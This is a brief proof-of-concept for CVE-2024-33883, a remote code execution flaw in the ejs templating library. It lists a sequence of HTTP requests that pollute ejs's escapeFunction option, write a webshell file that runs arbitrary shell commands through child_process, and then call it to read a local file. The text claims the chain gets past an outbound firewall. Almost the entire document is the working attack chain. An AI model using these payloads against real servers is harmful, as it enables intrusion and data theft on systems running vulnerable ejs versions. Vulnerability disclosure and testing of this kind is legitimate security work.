
PoC of CVE-2024-33883, RCE vulnerability of ejs.
Based on [email protected]
1. ejs/lib/ejs.js - line 580, 636, 637
1. GET /pollute?target=client&value=1
2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");
3. GET /
- Inject webshell
4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");
5. GET /
- Activate webshell
Above PoC can bypass outbound packet drop of ufw firewall.
All version under 3.1.10 is vulnerable for this type of attack.
This is RCE vulnerability, and do not abuse on live server.